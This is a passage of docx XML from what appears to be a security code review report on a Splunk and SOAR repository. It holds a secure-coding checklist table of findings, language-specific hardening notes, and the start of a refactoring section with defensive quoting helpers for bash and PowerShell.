              </w:rPr>
              <w:t>A fixed cloud console password ships in a playbook (PB1-06); the AD reset password uses a non-cryptographic generator (PB2-07); a well-known password is set on the test container (CI-14). The AD reset playbook does correctly avoid logging its generated password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Managed by the Splunk and SOAR platforms, not by repository code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions lack an approval gate and a protected-entity allow-list (PB1-03, PB2-09, PB2-10, DET-10); object-reference inputs are acted on without ownership checks (CF-09, CF-10); the app metadata exports knowledge objects system-wide (APP-08). Several playbooks demonstrate the correct prompt-plus-allow-list gate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cryptographic practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Partially met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Non-cryptographic random number generation is used to produce two passwords (PB2-07, SEC-07); no home-grown cryptography and no weak transport were found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Error handling and logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Partially met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A session token and a cleartext password are written to logs and comments (CI-03, PB2-08); bare and broad exception handlers swallow errors (CI-09, PB2-16, CF-13); validation relies on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>assert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> statements that are stripped under optimisation (CF-13). Most playbooks avoid logging secrets, and several support searches fail closed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Data protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Real account identifiers, access-key identifiers, an expired session token and employee personal data remain in sample logs (SEC-03 to SEC-05, SEC-10, APP-11); a function returns the full asset configuration including possible secrets (CF-11). A partial scrubbing effort exists but is inconsistent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Communication security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Partially met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">All downloads and test-data fetches use HTTPS, and no </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verify=False</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> reaches a remote host in the default deployment; however </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verify=False</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> is set uniformly on SOAR REST calls (PB2-11, CF-03) and 22 reference links use cleartext HTTP (DET-13).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>System configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub Actions, container images, app tarballs and the dependency tree are unpinned (DEP-01, DEP-03, DEP-05); workflows omit least-privilege permission blocks (CI-13); placeholder-domain detections ship inert (DET-07); permissive filter macros ship as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>search *</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (APP-04).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Database security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Partially met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The SPL and SOAR query-injection class is the analogue of SQL injection against the Splunk search tier; least-privilege search accounts are not enforced (PB2-05, PB2-06, DET-02).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-influenced paths reach file deletion and collection without canonicalisation (PB1-02, PB2-04); the archive extractor has no decompression caps or cleanup (CF-04); an executable is probed on an untrusted path (CI-08).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Memory management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The reviewed code is Python, JavaScript-free workflow YAML and SPL; there is no manual memory management. Resource-exhaustion issues are captured under input validation (CF-04, CF-05, CF-07, PB1-15).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>General coding practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1194" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Partially met</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>eval</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>os.system</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>subprocess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> shell, or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>pickle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> of untrusted data appears in shipped code, a genuine strength; however many files carry dead code, unused imports, deprecated datetime APIs and invalid escape sequences that already warn on current Python (CF-17, PB1-15, PB1-17).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Language-specific notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Python.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shlex.quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for shell arguments and a single-quote-doubling helper for PowerShell; replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for any security value; replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-based validation with explicit checks that raise; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defusedxml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for untrusted XML; add timeouts to every outbound request; and make every regular-expression literal a raw string. The PEP 8 and PEP 506 guidance is already followed in parts of the codebase and should be applied uniformly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>GitHub Actions.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Never interpolate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> context values into a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block; pass them through the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> map and reference shell variables. Pin every action to a commit digest, set an explicit least-privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block on every workflow, and keep untrusted-code jobs on ephemeral runners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Splunk SPL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quote every token substituted into a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> safe-quote filter; prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over the per-row </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command; and normalise case with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used as a security discriminator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Refactoring Recommendations and Secure Implementation Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The findings share a small number of root causes, so a handful of shared components resolve most of them. The detailed per-finding remediations in Section 4 give the exact fixed code; this section gives the cross-cutting refactors and the risk each one retires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 One escaping helper per query language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Add a single shared custom function per sink language and route every string that reaches that sink through it: a bash quoter using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shlex.quote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a PowerShell single-quote-literal quoter, an SPL quoter that applies the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter, an FQL value validator, an RFC 4515 LDAP escaper, a ServiceNow encoded-query sanitiser, and a REST-filter encoder that passes values through the request library's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> argument. This single refactor resolves the command-injection and query-injection findings across the playbooks, custom functions and detections (PB1-01 to PB1-05, PB2-01 to PB2-06, CF-01, DET-02, DET-05) and prevents regression because new content inherits the safe path. The project's Jira playbook already demonstrates the pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import shlex</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def safe_bash(parts):</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"""Join argv tokens so shell metacharacters cannot start a new command."""</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return " ".join(shlex.quote(str(p)) for p in parts)</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def ps_literal(value):</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"""Return a PowerShell single-quoted string literal (no subexpression evaluation)."""</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return "'" + str(value).replace("'", "''") + "'"</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
